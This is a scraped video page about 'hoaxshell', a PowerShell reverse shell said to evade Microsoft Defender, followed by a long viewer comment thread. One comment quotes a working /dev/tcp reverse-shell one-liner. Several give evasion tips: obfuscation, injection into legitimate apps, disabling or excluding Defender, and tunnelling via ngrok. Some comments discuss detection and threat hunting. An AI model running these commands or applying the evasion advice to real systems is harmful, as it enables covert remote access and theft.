Reverse Shell UNDETECTED by Microsoft Defender (hoaxshell)
HTML-код
- Опубликовано: 22 авг 2024
- j-h.io/plextrac SUPER thankful for PlexTrac for supporting the channel and sponsoring this vide -- try their premiere reporting & collaborative platform in a FREE one-month trial! Spend more time hacking, and less time reporting 😎
Help the channel grow with a Like, Comment, & Subscribe!
❤️ Support ➡ j-h.io/patreon ↔ j-h.io/paypal ↔ j-h.io/buymeac...
Check out the affiliates below for more free or discounted learning!
🖥️ Zero-Point Security ➡ Certified Red Team Operator j-h.io/crto
💻Zero-Point Security ➡ C2 Development with C# j-h.io/c2dev
🐜Zero2Automated ➡ Ultimate Malware Reverse Engineering j-h.io/zero2auto
🐜Zero2Automated ➡ MISP & Malware Sandbox j-h.io/zero2au...
⛳Point3 ESCALATE ➡ Top-Notch Capture the Flag Training j-h.io/escalate
👨🏻💻7aSecurity ➡ Hacking Courses & Pentesting j-h.io/7asecurity
📗Humble Bundle ➡ j-h.io/humbleb...
🐶Snyk ➡ j-h.io/snyk
🤹♀️SkillShare ➡ j-h.io/skillshare
🌎Follow me! ➡ j-h.io/discord ↔ j-h.io/twitter ↔ j-h.io/linkedin ↔ j-h.io/instagram ↔ j-h.io/tiktok
📧Contact me! (I may be very slow to respond or completely unable to)
🤝Sponsorship Inquiries ➡ j-h.io/sponsor...
🚩 CTF Hosting Requests ➡ j-h.io/ctf
🎤 Speaking Requests ➡ j-h.io/speaking
💥 Malware Submission ➡ j-h.io/malware
❓ Everything Else ➡ j-h.io/etc
![Eminem - Somebody Save Me (feat. Jelly Roll) [Official Music Video]](http://i.ytimg.com/vi/Vwa0HenQMi4/mqdefault.jpg)
Thank you from the heart for making this, John!
Heads up for the people watching this: hoaxshell's payload won't work in constrained language mode due to the method invocation error. The shell is actually established but as it utilizes POST requests to send each command's output back to the attacker, it gets cut off. It could work (in theory) if the output was send back to the attacker via GET, which of course would require to modify the tool and find a workaround for the limited length of chars that can be transferred within a URL.
This is awesome to have the provider of this script comment on your channel John. You’re awesome man you motivate me daily.
Would you be able to put some of the stuff that doesn't fit into the URL into a header?
@@centdemeern1 you could, although, i believe the best approach would be to split the cmd output to multiple get requests (if output.length > 2064 ) and notify the hoaxshell server accordingly to combine a number of GET requests, e.g. via a custom header, like "X-Combine: 5" or whatever. There's actually an unlimited amount of awesome things you could do by enriching the powershell payload but the length of it is a major issue. I tried to keep the payloads generated by hoaxshell as short and compact as possible.
@@HaxorTechTones I see, that makes sense.
Maybe something like this could be a command line flag (ex. --constrained-language-mode) with a warning that it'll make the payload larger.
If not, maybe I'll fork it or something. If I feel like it. Who knows.
@@centdemeern1 yeah i was actually thinking to add exactly that in the next update.
I think the problem you're getting with the base64 decode is that it is encoded in UTF-16 but the Linux base64 -d command decodes to ASCII
Probably encoded UTF-8, since it only encounters problems with one or two characters it seems. UTF-8 is compatible with ASCII until you use characters not in ASCII, which get encoded as double width or wider. Possibly sublime detected the resulting file as UTF-8 when ASCII would have been better, or something. Difficult to know exactly where things screwed up.
❌He doesnt copy all of the B64 at 11:00 lol, thats why❌
Edit: nah nvm
@@handlemchandleson1 Not true. Also he's pasting there. If the base64 string was incomplete, there wouldn't be the == at the end
@@beyondcatastrophe_ he forgot the first line at the top
@@handlemchandleson1 He doesn't use the pasted content though when he tries to select it within the payload.b64 file. He directly specifies base64 -d payload.b64 (which contains the full payload) instead of doing an echo "PasteStringHere" | base64 -d
Only 2 guys are my favorite in tech field on youtube, John Hammond & David Bombal
You’re forgetting @ippsec
and LiveOverflow!
@ippsec is probably not human LOL but certainly my best source into ethic hacking
yeah, you can definitely replace bombal from that list for a quality cyber sec channel... IPPSEC, hackersploit, The Cyber Mentor, etc.
No love for @jackrhysider ?
As a german, I have to admit... the X at 05:30 is SUS
It's left-handed, as opposed to what you're referring to. Probably a stylized Hindu sauwastika. It's also a character in Chinese and Japanese script, or it could be something else entirely. Aliens? Tire burns for monster trucks? The possibilities are endless!
Just found this channel last week and I'm loving it...
Hey John, have you had a look at the cmdlet New-Module? I came across it today in the documentation, apparently it allows for creating script blocks in memory. Wondering if that would work similar to iex
John, you have NO idea how long I've been trying different mechanisms unsuccessfully and after watching this, I decided to try it out...and dude!!! This tool is definitely amazing!!
5:00 This commentary on the code is just hilarious!
I am 1000% addicted to your content! Please keep this coming, my brain is in love with you!
You are right, PlexTrac
Is making a difference in reporting process
My first report at hacker1 was about open redirect in grab company
(Asian version of UBER)
With PlexTrac you can report in 15 minutes instead of 2 hours
To get them to your point and explain what you did
tried hoaxshell last month on Kali VM to my main PC with Avast Premium Security enabled and updated. It freaked me out Avast didn't detect anything, windefender neither.
avast sucks
@@elllieeeeeeeeeeeeeeeeeeeeeeeee got it for cheap, still better than win defender i guess
@FsocietyI see what you mean, but... I know I won't let any stranger go inside my house, what I can do is atleast to lock the door.
Hi John. As t3l3machus showed it in one of his vids. Hoaxshell actually still works with minimal modification to the base payload and goes through some free AV too
I love the way you break things down 👍 in all your videos. Continue your hard work
ngl the x in the logo do be looking kinda sus
Hey John! Cool video--I do some red teaming and I'd like to know how you come across these reverse shells that bypass EDRs. Are there decent resources on the clearnet?
Looks like that windows supporter watched your video. when cloud protection is on havoc´s demon gets flagged as a trojan🤣🤣🤣
I just tested it and it's already protected so you have to turn off the real-time protection. The thing is you just need it disabled for session initation, if you turn it on again when the reverse shell is already set up, it won't crash, you can continue entering the commands.
Hoaxshell was able to bypass elastic endpoint. I am pleased lol.
Awesome man! Now how to get it to run on a remote machine 😛
Thanks so much John! This worked really well for me on a HTB machine where the windows machine had an AV that blocked all reverse shells I tried, accept for the one shown in this video! Works amazingly :)
great content John, I'd be interested as well seeing how that looks from a threat hunting/ defender PoV, how could I detect it, spawned processes, event logs, dropped files etc. If I had sysmon running what could I see in a SIEM
Should have said, alerting on obfuscated powershell in a SIEM would have detected that it ran
probably that powershell - e payload in under powershell process, we can hunt for that in sysmon
@@purplesprout5774 It would, but in a real world it probably wouldn't be obfuscated. It would be casually placed somewhere in a 'utility' that does something else. The code block that is running on the windows machine is so simple that it probably almost exists in the wild for legitimate limited reasons. A legitimate app would not be a raw running of an expression fetched from somewhere, but it may parse some data from somewhere into part of an expression and run that. This still seems like a bad idea because if the parsing can be escaped it becomes a shell, but that doesn't mean it isn't done.
The problem is that this simple demonstration is not the real problem (though script kiddies will abuse it). More of an issue is deliberately weak parsing in an otherwise functional application involving invoke-expression. Preventing the use of invoke-expression on retrieved data would not be backward compatible, while detecting buggy parsing is 'hard' due to parsing being a Turing complete problem.
This demonstrates that any use of invoke-expression on data retrieved from a remote server is potentially a reverse shell. At best it is an attack surface, at worst a deliberate backdoor. I guess you could go through the uses of invoke-expression and try to characterise and whitelist legitimate ones. Automated detection is extremely hard though, due to 'doing anything' being invoke-expression working as intended.
A bit of a silly comment but; the way your lighting is setup it casts shadows from your glasses that look kinda like winged eyeliner. And honestly, slay dude, you look great, haha
You could probably edit that payload to ensure it grabs the system proxy settings and uses them, this way it should be usable from within enterprise networks.
Enterprise nws probably would have a firewall
@@elllieeeeeeeeeeeeeeeeeeeeeeeee True, and a connection to Port 80 instead 8080 will be tunneled through the proxy, maybe 443 with SSL and the Firewall is not set up to decrypt the stream to inspect it. Could work, good Enterprise Networks do SSL Inspection, but only if the host is not having set up security measures like Google or Microsoft do.
Problem is, like it always was, bring the code into a system and execute it. You can't send a ps1 file and say "hey, here is a patch", because per Default, script execution is disabled and a warning pops up. You can send an Exe file, which starts a powershell in a process in the background, but how do you get your App to your victim.
Still, a nice tool to know.
@@elllieeeeeeeeeeeeeeeeeeeeeeeee proxies exist to allow firewall bypass for specific protocols.
Users are often restricted in terms of what they can access via the proxy - ususlly based on categories defined by the proxy vendor, unless the company chooses to micromanage on a per-URL basis.
Admins, however, often have way less restrictions, and are a more valuable target anyway.
The solution is threat-hunting: someone must ensure logs are gathered from the end user devices, proxies, firewalls, switches & every other element in the chain, then built alerts and actions based on content found across all of those log types.
Unfortunately, it is already detected by Sophos AV. Three weeks ago it was still working. Unfortunately, already too well known. It is a matter of time that Windows Defender will detect the reverse shell. But cool project.
yea, but if u modify the source code only a little and also obfuscate it in layers, maybe it could still bypass
Unfortunately?
@@syskey1402 The problem is that many who look at John do not have the experience to analyze or read a code and change it so that it then works. I fully agree with you that the change is not detected by the Sophos AV. Weekend task for me. 😜
@@hackximus lol, yes
Ppl don't understand that windows defender might be bad but it does one thing that is really helpful it tells us that a app is signed by a valid company if the and if a app dosen't have a signature by a renowned company it's a really big red flag
SUPER thankful for PlexTrac for supporting the channel and sponsoring this video -- try their premiere reporting & collaborative platform in a FREE one-month trial! Spend more time hacking, and less time reporting 😎j-h.io/plextrac
AV picked it up real quick. Perhaps it has already been registered by defender as a threat.
Yup but disabling it can be a part of the script.
update: it does get blocked by AV now
This was cool, but in less than 7 months, Windows has made a patch for this. My newly created Win11 VM, with no updates AND most of Defender turned off was catching it. You must keep Real-Time Protection off (that's the only time I got a rev-shell), but it keeps turning itself back on now. I am updating the VM and I am going to try them again. Thanks for the vid! Awesome as always!
7 months lol is that supposed to be a bragg about windows security? lol
Easy to bypass , give it instructions to launch user level command prompt in the background (so user doesn’t see) obfuscate your new code so AV doesn’t pick up on the command prompt command , inject it into a legit application ( plenty of ways) and your good to go.
@@outcome2715 Cool. Thanks for the tips. You make it sound easy, I’ll have to try a little harder.
@@BrickTamlandOfficial no. If anything the opposite. But no that’s not at all why I said that. It was literally just the time that it was working then not.
That x is looking kinda SUS
I have created a Data deleter Ransomware that deletes the data within your files and you get reverse shell after the deletion is completed and it is undetectable, i run the mrt scan , malware bytes scan but none of them can detect it
which language?
@@shinchanstheory8002 scratch
@@shinchanstheory8002 golang
@@castroonie golang is automatically detected by every ac as a false positive
@@shinchanstheory8002 python
Guys it doesn't work anymore, try another one.
Hello @John Hammond sir
I've tried the Hoaxshell many times but it's not working... Can you checkout this and please provide the solution. Everytime I run the reverse shell, the defender detects the payload as malicious and throws error.
that X in the thumbnail looked like a hindu swastika 😂😂
lol watching a jh vid with a jh ad never seen this before
So presumably you would have control of the router and use that to deliver the payload and open a port for remote access but you still need to execute the powershell command on the target
Executing code on a target is a trivial task, given the multitude of delivery methods ranging from phishing thru web-based scripts to USB disks or keyboard impersonators.
If you can block all of those - and in theory it's not a bad idea - you'll end up in practice with a very limited-use computer, which might as well be running a RISC-based CPU & OS if it can still do its intended job in this state.
Isn't this just like you would type:
sh -i >& /dev/tcp/some_ip_here/some_port 0>&1
on a linux host? I mean of course the antivirus wouldn't
block it because it is the expected behaviour. What
would then be the difference between you connecting to a
reverse shell and your browser connecting to a web server?
From what I know a reverse shell vulnerability is suppose to
let you gain access to a host without having physical access
to it ( through a public web service or something ).
If I'm wrong or is something I'm missing please correct me.
Windows defender uses AMSI to detect the execution of malicious PowerShell, like a reverse shell. The point of this is, you can use the undetected reverse shell as a communication method to your c2 Server like Malware often does
@@_Slaze I see
Doesn't work anymore (tested on Windows 11 family edition , version 23H2) comment posted the 04/24/2024
awesome ! I'll use it on my next boxes for sure
nice john this is the main reason you r my most fav youtube content creator
I saw this from you first! Good stuff
@@Cossaw thanks mate but john hammond is great his all videos r on the whole different level
the x in the video’s picture looks kinda sussy
No threat Actors really uses Single reverse shell in the wild. But it's good to see WD and other AV's to get bypass from time to time 😏
John from the future has great hair
Damn, why do i want to combined with a hid attack ??? Is it just me or are there others like me 🙄🙄🙄🙄
I fail to see what's there to detect about this. User opening Powershell and executing a malicious command is his problem, no?
Hi John,
Love all content you created.
I'm learning Cyber; still finding a new laptop to work. Do you have any advice? May I ask what is ur device specifications?
Best
Man, your hair grew quickly!
I did try to replicate this and found out that this works only when the defender toolkit isn't installed on the system. Mine was win 11 enterprise eval edition similar to John and i saw that i needed to install the toolkit of some kind from the windows update in settings for the defender to start working. Maybe John's system didn't had that installed and so it bypassed it gracefully.
Now the question is how many systems have it?
@@draugh1r219 Yup, that is also true.
3:30 did they really use a swastika for the “X?” Lol
Hi John, how are you after a very long time watching your video? Amazing content, thank you
It's working thanks my friend
i think your b64 was weird cause by default it uses utf8 and yours was encoded with utf16 by hoaxshell it seems.
Let me know if im wrong
Awesome vid btw
Hi I am new to the topic and wanted to ask if it is theoretically possible to also not use his IP address for this but something else like a server?
Pip install ipapi , made me laugh fucking hard hahah
Seems like Windows needs to get it's security up.
I understand what the thumbnail is saying, but man does that x look suspicious
Hey man, It works great and without any problems.
Sweet. I will try this tonight. Sadly my antivirus windows 10 defender catches it but try the ducky script I posted
still works.
I think the garbage text is ASCII, and PowerShell uses UTF16le.
As always, everything is super. Waiting for new cheats from your side
You really good at explaining thank you
doesnt work anymore.
tested on fully updated wind 11 machine (28/10/22)
I remember in Windows 10 i made a batch script that automatically ran as administrator so i could use powershell commands to download the payload from my server and exclude.exe from being scanned
Great idea
@@olivermejia3786 i was honestly shocked how simple and effective it was i even wrote a blog about it
@@wtfdoiputhere exclude.exe?
@@outlawnation5160 yes, using powershell commands you could tell Windows defender to exclude certain folders or file types from being scanned
@@wtfdoiputhere that’s pretty powerful (no pun intended). Do you have a GitHub for the script?
where should i start if i wanna get into pentesting ( a part from experimenting myself) ?
My Windows 11 Pro guest is catching this
Just simply put the code, it works! thanks!
Hello everyone, I can not run hoaxshell listener on newest ubuntu, it gives error ,,No module named 'gnureadline'. New Python does not supported gnureadline. How can I fix this or how can i use hoaxshell on newest linux system?
How would you do reverse shells from outside the LAN? Port forwarding is too much effort xd
Hamachi ?
Use a server that will give you a public IP. (AWS for example).
Just use ngrok
its only a matter of time before more are found.
This tutorial is amazing and you are really good at teaching !! great job sir !
This exertion Hella good! Recommended
After havoc c2 ..... good one
I like the idea that the Author released this on Github then burn it as soon as it gets known.. 😆
Worked , thanks a lot!
Defender without the cloud options are basically worthless
John.. John Hammond. Good content 👏
wow discussed here👍
Thanks teacher ji🇮🇳💫
Great video very well explained- unfortunately two devices of mine are corrupted-hard disk errors-permissions and system keeps taking ownership!
This is because Powershell scripts running automatically+unrestricted policy-bios is configured WiFi as well-I can’t connect again with my new device to my WiFi due to powershell and kali linked- if anyone has any ideas i would really appreciate it -
you can bypass Amsi and then do Mimikatz
one question , does the windows machine has to be on the same network? im new in this area :)
in the video LAN IP addresses are used, what IP should be used if the payload is ran on a computer outside my network ? is it my public IP ?
theres three on my computer. they wont go away, contebrew, trickbot, "systen32" (not system systen)
I tried this one week before and it didn't worked the box have deep security enabled i disable the deep security agent and windows defender was already disabled prior to my testing but still it didn't worked.
wtf why is there a like swastika x in the name?
the x of hoaxshell is kinda strange
.
Can it work over internet if we place cloudfare url in place of ip address?
Now they start detecting it 😂
Good
It was already detected, John had to turn off cloud based protection for exactly that reason.
@@DeNikow did you even watch the video lmao
When will passwords allow for spaces and non-alpha numerics ?
Spaces probably never because of how databases and database connections work. Most allow special characters and some even full unicode
Patched in less than 10 days. 😔
Did you run powershell as an administrator? If so I don't see this software having any practical use besides possibly diagnostics. If you don't need an admin shell on the windows machine then it would be possible to write an autoexec.bat file and put it on a usb and then all it would take is a few moments access to the machine assuming the owner didn't disable autorun.
no powershell needed I think
but its on "stand alone "? or i need always to send the exploit and be listener
Sad it seems to be patched a few days ago
Undetected before this video that is 😂
Payload is encoded in base16
How does Crowdstrike deal with this?
Not working anymore.
this is soo good that i feel guilty just to watchit
We can find a few reverse shells if we search a little that can bypass win defender.. The hard part is finding a rat with rdp
what do you need rdp for? Just use the system shell
@@Bruh-sp2bj yeah. But there is a swag of rdp.. With shell we can do a lot but with rdp we can even get passwords stored in the browser of a victim..
@@codewithraiju1424 bruh ? if you have a shell then just download the saved passwords/cookies from the browser directory stored locally with help of that shell
@@realavdhut yeah but I think they are encrypted, Aren't they?
@@codewithraiju1424 yeah they are .. but there are different methods to retrieve it ... for eg enum_chrome
Min: 11:00 you didn't copy everything from the base64, no? Line 1 is missing if i'm seeing correctly
That what i was going to say, but its cool it still parially decoded it
he used the file to decode also how base64 works the first part of the decoded text wouldve been broken. not the middle part.